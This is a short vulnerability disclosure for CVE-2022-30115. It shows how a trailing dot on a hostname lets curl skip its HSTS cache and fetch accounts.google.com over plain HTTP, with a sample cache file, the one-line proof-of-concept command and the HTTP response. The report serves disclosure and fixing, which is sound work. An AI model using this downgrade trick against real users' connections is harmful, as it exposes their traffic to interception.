CVE-2022-30115: HSTS bypass via trailing dot

curl allows users to load a HSTS cache which will cause curl to use HTTPS instead of HTTP given a HTTP URL for a given site specified in the HSTS cache. If the trailing dot is used, the HSTS check will be bypassed. If a user has a preloaded hsts.txt: `````` # Your HSTS cache. https://curl.se/docs/hsts.html # This file was generated by libcurl! Edit at your own risk. accounts.google.com "20230503 08:47:52" `````` Doing the following: `````` curl --hsts hsts.txt http://accounts.google.com. `````` Will cause accounts.google.com to be loaded over HTTP `````` <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>301 Moved</TITLE></HEAD><BODY> <H1>301 Moved</H1> The document has moved <A HREF="http://accounts.google.com/">here</A>. </BODY></HTML> `````` This issue has been raised in other HTTP clients before such as in https://bugs.chromium.org/p/chromium/issues/detail?id=461481 and https://www.mozilla.org/en-US/security/advisories/mfsa2015-13/ ## Impact HSTS bypass